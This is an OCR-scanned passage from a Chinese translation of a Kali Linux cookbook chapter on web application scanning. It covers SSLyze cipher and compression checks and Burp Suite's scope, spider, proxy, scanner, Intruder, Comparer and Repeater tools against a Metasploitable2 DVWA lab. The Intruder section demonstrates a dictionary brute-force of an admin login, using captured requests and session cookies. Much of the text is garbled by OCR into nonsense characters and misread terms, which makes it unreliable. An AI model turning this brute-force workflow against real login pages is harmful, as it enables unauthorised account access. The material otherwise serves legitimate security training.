TEA ARR > TLS 或 者 SSL 的 单个 版 本 可 以 被 测试 来 枚 举 和 版 本 相关 的 所 支持 的 密 
文 。 下 面 的 例子 中 ，SSLyze 用 于 枚 举 受 TLSv1.2 支持 的 密 文 ， 之 后 使 用 grep 来 
提取 出 256 位 的 密 文 。 


root@KaliLinux:~# sslyze google.com --tlsvi 2 | grep "256 bits" 
ECDHE-RSA-AES256-SHA384 256 bits 
ECDHE -RSA-AES256 - SHA 256 bits 


ECDHE -RSA-AES256 - GCM-SHA384256 bits 


AES256-SHA256 256 bits 
AES256-SHA 256 bits 
AES256-GCM- SHA384 256 bits 


SSLyze 支持 的 一 个 非常 拥有 的 特性 是 Zlib 压缩 的 测试 。 如 果 开 局 了 压缩 ， 会 直接 
关系 到 信息 列 楼 漏洞 ， 被 称 

为 Compression Ratio Info-leak Made Easy (CRIME) 。 这 个 测试 可 以 使 
用 --comprision 参数 来 执行 : 


root@KaliLinux:~# sslyze google.com --compression 


CHECKING HOST(S) AVAILABILITY 


google.com:443 => 173.194.43.40:443 


* Compression : Compression Support: Disabled 
** (TRUNCATED) ** 


工作 原理 


SSL/TLS 会 话 通常 通过 客户 端 和 服务 端 之 间 的 协商 来 建立 。 这 些 协 商会 考虑 到 每 一 
端 配置 的 密 文 首 选项 ， 并 且 尝 试 判断 双方 都 支持 的 最 安全 的 方案 。SSLyze 的 原理 
是 遍历 已 知 密 文 和 密 钥 长 度 的 列表 ， 并 尝试 使 用 每 个 配置 来 和 远程 服务 器 协商 会 
话 。 这 允许 SSLyze MAS LAF 1) BT Fo KH o 


7.4 使 用 BurpSuite 确定 Web 应 用 目标 


在 执行 渗透 测试 的 时 候 ， 确 保 你 的 攻击 仅仅 针对 目标 系统 非常 重要 。 针 对 额外 目标 
的 攻击 可 能 导致 法 律 问题 。 为 了 使 损失 最 小 ， 在 Burp Suite 中 确定 你 的 范围 十 分 重 
要 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 使 用 BurpSuite 确定 范围 内 的 目标 。 


AE 

为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $543 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 来 通过 BurpSuite 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 


TRAE Y HR 
BurpSuite 的 最 左边 的 标签 页 就 是 Target 。 这 个 标签 页 的 底下 有 两 个 标签 页 ， 包 


Ww SR 


4& Site Map 和 Scope 。 在 通过 设置 代理 的 Web 浏览 器 访问 时 ， SiteMap 4 
签 页 会 自动 填充 。 Scope 标签 页 允许 用 户 配置 站 点 和 其 内 容 ， 来 包含 或 者 排除 站 
点 。 为 了 向 评估 范围 内 添加 新 的 站 点 ， 点 击 Include in Scope 表格 下 的 Add 按 
钮 。 像 这 样 : 


Specify a regular expression to match each URL component, or leave blank 
to match any item. An IP range can be specified instead of a hostname 


Protocol | HTTP wj 





Host or IP range: ^172\.16\.36\.1355 


Port ^80$ 


File 
一 = 


L Paste URL | | OK | | Cancel | 


所 添加 的 内 容 通常 是 IP 地 址 范围 ， 或 者 由 单独 的 文件 指定 。 Protocal 选项 会 显 
示 下 拉 菜 单 ， 包 含 ANY、HTTP、HTTPS。 Host or IP range 字段 可 以 包含 
个 主机 名 称 ， 单 个 IP， 或 者 IP 范围 。 此 外 ， 也 存在 Port 和 File 的 文本 字段 。 
字段 可 以 留 空 ， 或 者 用 于 指定 范围 。 字 段 应 该 使 用 正则 表达 式 来 填充 。 在 所 提供 的 
例子 中 ， 脱 字符 (o^ ) 是 正则 表达 式 的 开始 ， 美 元 符号 用 于 闭合 正则 表达 式 ， 反 
斜 枉 用 于 转移 特殊 字符 ，， 它 用 于 分 隔 IP 地 址 的 段 。 正 则 表达 式 的 用 法 并 不 在 本 
书 的 范围 内 ， 但 是 许多 互联 网 上 的 开放 资源 都 解释 了 它们 的 用 法 。 你 可 以 访 

问 http://www.regularexpressions.info/ 来 熟悉 一 下 正则 表达 式 。 


工作 原理 
正则 表达 式 在 逻辑 上 定义 条 件 ， 通 过 指定 主机 、 端 口 或 范围 中 包含 的 文件 。 定 义 评 


估 范 围 会 影响 它 在 和 Web 内容 交互 时 的 操作 方式 。BurpSuite 配置 定义 了 可 以 执行 
什么 操作 ， 它 们 位 于 范围 内 ， 以 及 什么 不 能 执行 ， 它 们 在 范围 之 外 。 


7.5 使 用 BurpSuite #3% 


AT ARIA Web 应 用 ， 了 解 服务 器 上 所 托管 的 Web 内 容 非常 重要 。 可 以 使 用 做 
种 技巧 来 探索 Web 应 用 的 整个 攻击 面 。 几 蛛 工具 可 以 用 于 快速 识别 Web 应 用 中 引 
用 的 链接 内 容 。 这 个 秘籍 中 ， 我 们 会 谈论 如 何 使 用 BurpSuite RE Web 应 用 来 识 
别 范围 内 的 内 容 。 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 m 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 7 gs 配置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 


此 外 ， 你 的 Web 浏览 器 需要 配置 ue 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 浏览 器 代理 的 更 多 信 ， > AFB 参考 第 一 章 的 “配置 x BurpSuite"— ¥ o 


操作 步骤 


为 了 自动 化 卜 取 之 前 定义 的 范围 内 的 内 容 ， 点 击 屏幕 顶端 的 Spider 标签 页 。 下 面 
会 有 两 个 额外 的 标签 页 ， 包 括 Control 和 Options ° Options 标签 页 允许 用 户 
配置 疾 蛛 如 何 指定 。 这 和 包括 详细 设置 、 深 度 、 限 制 、 表 单 提交 以 及 其 它 。 psu 
JG ak 85 Bo E JESS R^ 09 E A6 ER A 89 PT. Web 内 容 发 送 请 求 。 这 可 能 会 
破坏 甚至 是 损坏 一 些 Web 内 容 。 一 旦 拍 治 好 了 ， Control 标签 页 可 以 用 于 选择 开 
AAI oH > Spider 标签 页 是 暂停 的 ， 点 击 按钮 可 以 启 Z) in 

Ek» Target 标签 页 下 面 的 Site Map 4&4 i E Esse EP E S3:.45 
这 样 : 


Spider Status 


Use these settings to monitor and control Burp Spider. 


Spider is paused Clear queues 


Requests made: 39 
Bytes transferred: 689,300 
Requests queued: 91 


Forms queued: 12 


EAE ILC Re SLE NE ie E 
应 。 输 入 表单 需要 的 参数 ， 或 者 通过 Ignore Form 按钮 来 跳 过 表单 ， 像 这 


Burp Spider needs your guidance to submit a login form. Please choose the value of each form field which should be used when 
submitting the form. You can control how Burp handles forms in the Spider options tab. 


Action URL: http://172.16.36.135/mutillidae/index.php?page -login.php 
Method POST 





Type | Name | Value 

| Text username 
Submit login-php-submit-buttoneLogin 
Password password 


Submit form ignore form 


作为 替代 ， 你 可 以 通过 右 击 Site Map AEH PAN eB AUS A 
i: Spider ^ E EU 3x Zh Ja Je XX P ET VA BPH ELS YE TT SC TE 
或 目录 。 像 这 


Y http://172.16.36.135. 
> DX dwa 
[5 dvwa 


Lp o» n mutillidae 


D http://172.16.36.135/mutillidae 


Remove from scope 











Spider from here 
Do an active scan 
Do a passive scan 
Send to Intruder 
Send to Repeater 
Send to Sequencer 





工作 原理 


BurpSuite 次 蛛 工 具 的 工作 原理 是 解析 所 有 已 知 的 HTML. 内 容 ， 并 提取 指向 其 它 内 
容 的 链接 。 链接 内 容 随后 会 用 于 分 析 所 包含 的 其 它 链接 内 容 。 这 个 过 程 会 无 限 继续 
下 去 ， 并 只 由 可 用 的 链接 内 容 总 数 ， ， 指 定 的 深度 ， 以 及 处 理 额外 请 求 的 当前 线程 数 
量 所 限制 。 


7.6 使 用 BurpSuite 参与 工具 
BurpSuite 也 拥有 可 以 用 于 基本 的 信息 收集 和 目标 分 析 的 工具 。 这 些 工具 叫做 参与 


工具 。 这 个 秘籍 中 ， 我 们 会 谈论 如 何 使 用 这 些 BurpSuite 中 补充 的 参与 工具 来 收集 
或 组 织 目 标 的 信 DS © 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 

Metasploitable2 拥有 多 A 安装 装 的 漏洞 Web & Fi] > 3647 TCP 80 端口 上 。 配 置 

Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 Vou BurpSuite 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite" 一 节 。 


操作 步骤 


参与 工具 可 以 通过 邮寄 站 点 地 图 中 的 任何 对 象 ， 之 后 下 拉 扩 展 惨淡 并 选择 所 需 工具 
来 访问 。 通 常 ， 所 选 的 参与 工具 会 递归 定位 所 选 目 标 ， 来 包含 所 有 文件 和 目录 。 像 
这 样 : 

















Y http://172.16.36.135 Host Method 
Y & mutillidae Sy manedbasm GET 
^9 Miani) |query.com GET 
> BB] @ http://172.16.36.135 /mutillidae/ m GET 
N Remove from scope r » 
D Spider this branch ; ea 
D Actively scan this branch GET 
D Passively scan this branch ANÁ tri EET 
"E Send to Intruder Metal samurai.inguar ;ET 
: 2 Send to Repeater Meta+R www. textfiles.« JET 
D Send to Sequencer www. owas p.org ET 
"m Send to Comparer (request) 
D md Send to Comparer (response) 


1 [ Response 


Search 


Show response in browser 
Request in browser 















Compare site maps Find comments 

Expand branch 

Expand requested items Find references 

Delete item Analyze target 

Copy URLs in this branch Discover content 

Copy links in this branch Schedule task 

Copy as curl command Simulate manual testing 


Save selected items 





我 们 会 以 每 个 工具 HAER 单 中 的 顺序 来 着 重 讲解 它们 。 出 于 组 织 原因 ， 我 认为 最 
好 在 下 列 重点 中 介绍 它们 : 


e Search (搜索 ) : 这 个 工具 可 用 于 搜索 术语 、 短 语 和 正则 表达 式 。 它 会 返回 
任何 包含 查询 术语 的 HTTP 请 求 或 响应 。 对 于 每 个 返回 的 项 目 ， 所 查询 的 术语 
会 高 亮 显 示 。 

e Find comments (发 现 注释 ) : 这 个 工具 在 所 有 JS、 HTML 和 其 它 源 代码 
TEC 浏览 指定 的 Web 内 容 并 定位 所 有 注释 。 这 些 只 是 可 以 导出 便于 之 后 
复查 。 Rod sed 因为 开发 者 经 常会 在 注释 中 留 下 敏感 信息 。 


e Find scripts (发 现 脚 本 ) : 这 个 工具 会 识别 Web 内 容 中 的 任何 客户 端 和 
服务 端的 脚本 。 

e Find reference (发 现 引 用 ) : 这 个 工具 会 解析 所 有 HTML. 内 容 并 识别 其 
它 的 被 引用 内 容 。 


e Analyse target (分 析 目 标 ) : iX AIL E REL S ATE HARA 
和 指定 Web 内 容 所 带 的 参数 。 这 这 在 组 织 Web 应 用 测试 ， 并 且 应 用 带 有 大 量 的 
EP ASASH 十 分 有 用 。 


e DS USE content (探索 内 容 ) : 这 个 工具 可 以 用 于 爆破 目录 和 文件 名 ， 
过 循环 遍 遍历 单词 列表 和 已 知 的 文件 扩展 名 列表 © 


e Schedule task (计划 任务 ) : 这 个 工具 允许 用 户 定 义 时 间 和 日 期 ， 在 
BurpSuite 中 开始 和 停止 多 种 任务 。 


e Simulate manual testing (模拟 手动 访问 ) : 这 个 工具 是 一 个 不 错 的 方 
^ , 就 像 是 你 在 执行 Web 站 点 的 手动 A MERGE 而 你 实际 上 可 以 去 喝 咖啡 和 
吃 甜 甜 圈 。 这 个 工具 其 实 没有 什么 实际 功能 ， 主 要 是 迷惑 你 的 老板 。 


工作 原理 


BurpSuite 参与 工具 以 多 种 方式 工作 ， 取 决 于 所 使 用 的 工具 。 许 多 参与 工具 执行 功 
能 搜索 ， 并 检测 已 收 到 的 响应 中 的 特定 信息 。 Discover content 工具 通过 循环 
遍历 定义 好 的 列表 ， 爆 破 文件 和 目录 名 称 ， 提 供 了 探索 新 的 Web 内 容 的 功能 。 


7.7 使 用 BurpSuite Web 代理 


虽然 它 有 许多 可 用 工具 ，BurpSuite 的 主要 功能 就 是 拦截 代理 。 这 就 是 说 ， 
BurpSuite 拥有 捕获 请 求 和 响应 的 功能 ， 以 及 随后 操作 它们 来 将 其 转发 到 目的 地 。 
这 个 秘籍 中 ， 我 们 会 讨论 如 何 使 用 BurpSuite 拦截 或 记录 请 求 。 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 种 预 安装 装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 3i& 配置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" #244 


此 外 ， 你 的 Web 浏览 器 需要 配置 pup 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 


操作 步骤 


BurpSuite 的 功能 可 以 以 被 动 或 拦截 模式 使 用 。 uu 了 拦截 器 ， 所 有 请 Qr 
应 都 会 简单 记录 到 HTTP History (HTTP 5 €) 4 ~ 。 可 以 从 列表 中 选择 它 
们 ， 来 浏览 它们 或 查看 任何 请 求 或 响应 的 细节 ， 像 这 





# 入 | Host Method | URL | Params 








1 http://172.16.36.135 GET /mutillidae C 
2 http://172.16.36.135 GET /mutillidae/ 已 
5 http://172.16.36.135 GET /mutillidae/javascript/bookmark-si... U 
6 http://172.16.36.135 GET [mutillidae/javascript/ddsmoothm... Q 
8 http://172.16.36.135 GET /mutillidae/javascript/ddsmoothm... JB 
26 http://172.16.36.135 GET /dvwa 2 
27 http://172.16.36.135 GET /dvwa/ Lj 
28 http://172.16.36.135 GET /dvwa/login.php 口 
31 http://172.16.36.135 POST /dvwa/login.php 
32 http://172.16.36.135 GET Idvwa/ index.php 口 
34 http://172.16.36.135 GET [dvwa/ dvwa/js / dvwaPage.js DJ 


作为 替代 ， Intercept (拦截 器 ) 按钮 可 以 按 下 来 捕获 发 送 过 程 中 的 流量 。 这 些 
请 求 可 以 在 Proxy 标签 页 中 操作 ， 之 后 会 转发 到 目的 地 ， 或 者 丢弃 。 通 过 选 

择 Opyions 标签 页 ， 拦 截 器 e000 ， 或 者 其 
至 在 响应 到 达 浏 览 器 之 前 拦截 它们 ， 像 这 


(Foward | | Drop | [mter] | Action | Comment this wen LJ 


Params | Headers | Hex 





GET 
/dvwa/vulnerabilities/brute/?username-admin&password-password 
&Login=Login HTTP/1.1 

Host: 172.16.36.135 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; 
rv:28.0) Gecko/20100101 Firefox/28.0 

Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0 
8 


Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://172.16.36.135/dvwa/vulnerabilities/brute/ 
Cookie: security"high; 
PHPSESSID-bd3180c67310c158a030f8abe39ea179 

Connection: keep-alive 


工作 原理 


BurpSuite 代理 可 以 拦截 或 被 动 记录 浏览 器 接受 或 发 送 的 流量 ， 因 为 它 逻 辑 上 配置 

在 浏览 器 和 任何 远程 设置 之 间 。 浏 览 器 被 配置 来 将 所 有 请 求 发 送 给 Burp 的 代理 ， 

ERMAN CHL MEAT SSB Xp o HPT ACH * Burp ia 
送 中 的 请 求 和 响应 ， 或 者 记录 所 有 发 往 或 来 自 客户 端 浏 览 器 的 通 


7.8 使 用 BurpSuite Web & F 13 45 Z 


BurpSuite 可 以 用 作 高 效 的 Web 应 用 漏洞 扫描 器 。 这 个 特性 可 以 用 于 执行 被 动 分 析 
和 主动 扫描 。 这 个 秘籍 中 ， 我 们 会 谈论 如 何 使 用 BurpSuite 执行 被 动 和 主动 漏洞 扫 
J o 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 TA 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 3 v E » ME 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 来 通过 BurpSuite 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 "配置 BurpSuite” 一 节 。 


TRE YH 


iü 第 > BurpSuite 会 被 动 扫 描 所 有 范围 内 的 Web 内 容 ， 它 们 通过 浏览 器 在 连接 代理 
时 范围 。 术 语 “ 被 动 扫 描 " 用 于 指 代 BurpSuite 被 动 观察 来 自 或 发 往 服 务 器 的 请 求 和 响 
应 ， 并 检测 内 容 中 的 任何 漏洞 标识 。 被 动 扫 描 不 涉及 任何 注入 或 探 针 ， 或 者 其 他 确 
认可 疑 汤 洞 的 尝试 。 





Y @dwa © Password field submitted using GET method 


i index.php ! Cookie without HttpOnly flag set 
@ login.php >» | Frameable response (potential Clickjacking) [4] 
Y @ vulnerabilities i Content type incorrectly stated 
Y @ brute 
e! 


主动 扫描 可 以 通过 右键 点 击 任何 站 点 地 图 中 的 对 象 ， 或 者 任何 HTTP 代理 历史 中 的 
请 求 ， 并 且 选 择 Actively scan this branch ， 或 者 Do an active scan ° 


像 这 样 


| Y http://172.16.36.135 
> [3 dvwa 
[3 dvwa 
Y BY mutillidae 







(9 http://172.16.36.135/mutillidae/ 
Remove from scope 
Spider this branch 


y scan this branch 










Passively scan this branch 
Send to Intruder 
Send to Repeater 


所 有 主动 扫描 的 结果 可 以 通过 选择 Scanner 下 方 的 Scan queue 标签 页 来 复查 。 
通过 双击 任何 特定 的 扫描 项 目 ， 你 可 以 复查 特定 的 发 现 ， 因 为 它们 属于 该 扫描 ， 像 
这 样 : 







| Host | URL Status | Issues Requests Errors | Insertion points 
http://172.16.36.135  /mutillidae/ 50% complete 51 3 
http://172.16.36.135 /mutillidae/ 33% complete 62 5 
http://172.16.36.135  /mutillidae/ 28* complete 6 
http://172.16.36.135 /mutillidae/index.php 10% complete 9 





主动 扫描 可 以 通过 选择 Options 标签 页 来 配置 。 > 你 可 以 定义 要 执行 的 扫描 
类 型 ， 扫 描 速 度 ， 以 及 扫描 的 彻底 性 。 


工作 原理 


BurpSuite 的 被 动 扫 描 器 的 工作 原理 是 仅仅 评估 经 过 它 的 流量 ， 这 些 流量 在 浏览 器 
和 任何 远程 服务 器 之 问 通 信 。 这 在 识别 一 些 非常 明显 的 漏洞 时 非常 有 用 ， 但 是 不 足 
^ aes 存在 于 服务 器 中 的 更 加 严重 的 漏洞 。 主 动 扫描 器 的 原理 是 发 送 一 系列 探 

给 请 青 求 中 识别 的 参数 。 这 些 探 针 可 以 用 于 识别 许多 常见 的 Web 应 用 漏洞 ， 例 如 
DE JA o ee 


7.9 使 用 BurpSuite Intruder (T Z) 


BurpSuite 中 的 另 一 个 非常 有 用 的 工具 就 是 Intruder。 这 个 工具 通过 提交 大 量 请 求 来 
执行 快 节奏 的 攻击 ， 同 时 操作 请 求 中 预定 义 的 载荷 位 置 。 我 们 会 使 用 BurpSuite 
Intruder 来 讨论 如 何 自动 化 请 求 内 容 的 操作 。 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 来 通过 BurpSuite 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 


操作 步骤 


为 了 使 用 BurpSuite Intruder， 需 要 通过 拦截 捕获 或 者 代理 历史 向 其 发 送 请 求 。 完 成 
之 后 ， 右 击 请 求 并 选择 Send to Intruder ， 像 这 样 : 


GET /dvwa/vulnerabilities/brute/?username-admin&password-payload here&Login-Login 
Host: 172.16.36.135 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 
Accept: text/html,application/xhtml+xml,application/xml);q=0.9,*/*;q=0.8 
Accept-Lanquage: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 


Referer: http://172.16.36.135/dvwa/vulnerabilities/brute/?usernam Send to Spider 
Cookie: security=low) PHPSESSID*bd3180c67310c158a030f8abe39ea179 D 
Connection: keep-alive O an active scan 


在 下 面 的 例子 中 ，DVWA Brute Force 应 用 的 登录 入 口中 输入 了 用 户 名 和 密码 。 
在 发 往 Intruder 之 后 ， 可 以 使 用 Positions 标签 页 来 设 Praga 为 了 尝试 爆破 管 
理 员 密码 ， 需 要 设置 的 载荷 位 置 只 有 password 参数 ， 像 这 








$4 3x Web 应 用 扫描 





GET 
/dvwa/vulnerabilities/brute/?username=admin&password=§payload heres 
&Login=Login HTTP/1.1 

Host: 172.16.36.135 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) 
Gecko/20100101 Firefox/28.0 

Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,enj;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: 
http://172.16.36.135/dvwa/vulnerabilities/brute/?username=admin&pas 
sword=password&Login=Login 

Cookie: security=low; PHPSESSID-bd3180c67310c158a030f8abe39ea179 
Connection: keep-alive 


一 旦 载荷 位 置 定义 好 了 ， 被 注入 的 载荷 可 以 在 Payloads 标签 页 中 配置 。 为 了 执行 
字典 攻击 ， 我 们 可 以 使 用 自 定义 或 内 建 的 字典 列表 。 这 个 例子 中 ， 内 建 
的 Passwords 列表 用 于 这 次 攻击 ， 像 这 样 o> 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


| 


Add from list ... 
Fuzzing - quick 
Fuzzing - full 
Usernames 














Short words 
a-z 
A-Z 


一 旦 配置 好 了 攻击 ， 你 可 以 点 击 屏幕 顶端 的 Intruder 菜单 ， 之 后 点 

击 start attack 。 这 会 通过 将 每 个 值 插入 到 载荷 位 置 ， 快 速 提 交 一 系列 请 求 。 
为 了 判断 是 否 存在 任何 请 求生 成 了 完全 不 同 的 响应 ， 我 们 可 以 将 结果 按照 长 度 排 
序 。 这 可 以 通过 点 击 Length 表 头 来 完成 ， 通 过 点 击 将 长 度 降 序 排列 ， 我 们 可 以 识 
别 出 某 个 长 度 其 它 响应 的 响应 。 这 就 是 和 长 度 密码 相关 (碰巧 为 password ) 的 响 
应 。 成 功 的 登录 尝试 会 在 下 一 个 秘籍 中 进一步 确认 ， 那 些 我 们 会 讨论 Comparer 的 
用 法 。 








Request | Payload | Status | Error | Timeout | 

0 200 g O 4882 
6 SSRV 200 Q O 4882 
5 !root 200 go 日 4882 
7 $secure$ 200 Q Q 4882 
11 ABC123 200 g O 4882 
8 *3noguru 200 O m 4882 
工作 原理 


323 


BurpSuite Intruder 的 原理 是 自动 化 载荷 操作 。 它 允许 用 户 指定 请 求 中 的 一 个 或 多 个 
AU SLE ， ， 之 后 提供 大 量 选项 ， 用 于 配置 这 些 值 如 何 插入 到 载荷 位 置 。 它 们 会 每 次 
迭代 后 修改 。 


7.10 使 用 BurpSuite Comparer (比较 器 ) 


在 执行 Web 应 用 评估 是 ， 能 够 轻易 识别 HTTP 请 求 或 者 响应 中 的 变化 非常 重要 。 
Comparer 功能 通过 提供 图 形 化 的 变化 概览 ， 简化 了 这 一 过 程 。 这 个 秘籍 中 ， 我 们 
会 谈论 如 何 使 用 BurpSuite 识 别 和 评估 多 种 服务 器 器 响应 。 


准备 
为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 


Metasploitable2 拥有 多 人 安装 装 的 漏洞 Web & M > 3647 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 来 通过 BurpSuite 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 


操作 步骤 


aul ee 致 内 容 的 异常 通常 都 值得 调查 。 响 应 中 的 变化 通常 是 载荷 产生 了 所 需 
结果 的 明显 标志 。 在 前 面 使 用 BurpSuite Intruder 来 爆破 DVWA 登录 的 演示 中 ， 某 
个 特定 的 载荷 生成 了 比 其 它 更 长 的 响应 。 为 了 评估 响应 的 变化 ， 右 击 事件 并 点 


击 Send to Comparer (response) 。 








Request | Payload | Status Error Timeout | Length  * | Comment | 
0 200 OQ 已 4882 Result $2590 
: pod =p = 一 d Do an active scan 
a Uu 
7 $secure$ 200 日 日 4882 Do : — ea 
8 *3noguru 200 Q 日 4882 Send to Intruder 
10 A.M.I 200 | 口 4882 Send to Repeater 
11 ABC123 200 Q g 4882 Send to Sequencer 
12 ACCESS 200 (J DD 4882 Send to Comparer (request) 
13 ADLDEMO 200 g 回 4882 en BONSE 





将 事件 发 送 给 Comparer 之 后 ， 你 可 以 选择 屏幕 上 访 的 Comparer 标签 页 来 评估 它 
们 。 确 保 之 前 的 响应 之 一 选择 为 item 1 ， 另 外 的 一 个 响应 选择 为 item 2 ， 像 
这 样 : 


Select item 1: 


a | Length | Data 


2 4882 HTTP/1.1 200 OK Date: Sun, 13 Apr 2014 07:45:19 GMT 


在 屏幕 下 方 ， 存 在 compare words 和 compare words 的 选项 。 这 里 我 们 选 

择 compare words 。 我 们 可 以 看 到 ， 响 应 中 一 些 内 容 的 变化 反映 了 登录 成 功 。 任 
何 修改 、 删 除 或 添加 的 内 容 都 会 在 响应 当中 高 亮 显 式 ， 使 其 更 加 易于 比较 ， 像 这 
样 : 


«form action="#" method ="GET"> 
Username: «br» «input type="text" name-"username"» <br> 
Password: «br» «input type="password” AUTOCOMPLETE "off" 
name="password"> «br» 
«input type="submit" values"Login" name="Login"> 
</form> 


«p» assword 





Key Modified |Deleted! Added 


工作 原理 


BurpSuite Comparer 的 原理 是 分 析 任 意 两 个 内 容 来 源 ， 并 找 出 不 同 。 这 些 不 同 被 识 
别 为 修改 、 删 除 或 添加 的 内 容 。 快 速 区 分 内 容 中 的 变化 可 以 用 于 高 效 判断 特定 操作 
的 不 同 效 果 。 


7.11 使 用 BurpSuite Repeater (#224 ) 


在 执行 Web 应 用 评估 过 程 中 ， 很 多 情况 下 需求 手动 测试 来 利用 指定 的 漏洞 。 捕 获 
代理 中 的 每 个 响应 、 操 作 并 转发 非常 消耗 时 间 。BurpSuite 的 Repeater 功能 通过 一 
致 化 的 操作 和 提交 单个 请 用 ， 简 化 了 这 个 过 程 ， 并 不 需要 在 浏览 器 中 每 次 重新 生成 
流量 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 使 用 BurpSuite 执行 手动 的 基于 本 文 的 审计 。 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 a 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 3 v E » ME 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 dy PUN 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 
操作 步骤 


为 了 使 用 BurpSuite Repeater， 请 求 需要 通过 拦截 捕获 史 来 发 送 给 它 。 
发 送 之 后 ， 右 击 请 求 之 后 选择 Send to Repeater ， 像 这 


第 七 章 Web 应 用 扫描 


GET /dvwa/vulnerabilities/xss_r/?name=Hutch HTTP/1.1 

Host: 172.16.36.135 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) 
Accept: text/html,application/xhtml*xml,application/xml;q»0.9,*/* 
Accept-Language: en-US,enj;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://172.16.36.135/dvwa/vulnerabilities/xss r/ 

Cookie: security-medium; PHPSESSID=bd3180c67310c158a030f8abe39eal 
Connection: keep-alive 









Send to Spider 
Do an active scan 
